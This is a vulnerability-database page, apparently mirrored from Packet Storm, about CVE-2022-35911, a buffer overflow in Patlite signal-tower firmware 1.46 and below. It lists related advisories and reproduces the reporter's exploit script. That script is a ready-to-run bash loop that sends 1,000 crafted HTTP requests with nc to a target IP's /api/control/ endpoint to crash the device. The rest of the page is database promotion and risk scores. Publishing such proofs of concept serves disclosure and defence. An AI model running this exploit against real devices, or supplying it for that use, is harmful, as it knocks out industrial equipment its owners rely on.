Lucene search
K

Patlite 1.46 Buffer Overflow

🗓️ 25 Jul 2022 00:00:00Reported by Samy YounsiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 272 Views

CVE-2022-35911 Patlite Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-35911
27 Jul 202221:15
attackerkb
Circl
CVE-2022-35911
28 Jul 202200:36
circl
CNNVD
Patlite 缓冲区错误漏洞
25 Jul 202200:00
cnnvd
CVE
CVE-2022-35911
27 Jul 202220:05
cve
Cvelist
CVE-2022-35911
27 Jul 202220:05
cvelist
NVD
CVE-2022-35911
27 Jul 202221:15
nvd
Prion
Design/Logic Flaw
27 Jul 202221:15
prion
Positive Technologies
PT-2022-23017 · Patlite · Patlite Nh-Fb Series
25 Jul 202200:00
ptsecurity
RedhatCVE
CVE-2022-35911
9 Jan 202610:40
redhatcve
`# Exploit Title: CVE-2022-35911 - Patlite Overflow.  
# Date: 2022-07-07  
# Exploit Author: Samy Younsi - Necrum Security Labs  
# Vendor Homepage: https://www.patlite.co.jp  
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html  
# Version: Versions 1.46 and bellow are affected  
# Tested on: CentOs & Ubuntu  
# CVE : CVE-2022-35911  
  
  
#!/bin/bash  
  
IP="192.168.1.101"  
PORT="80"  
  
for i in {0..1000};   
do   
echo "[$i]: ";   
echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT;   
done > /dev/null 2>&1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jul 2022 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00572
272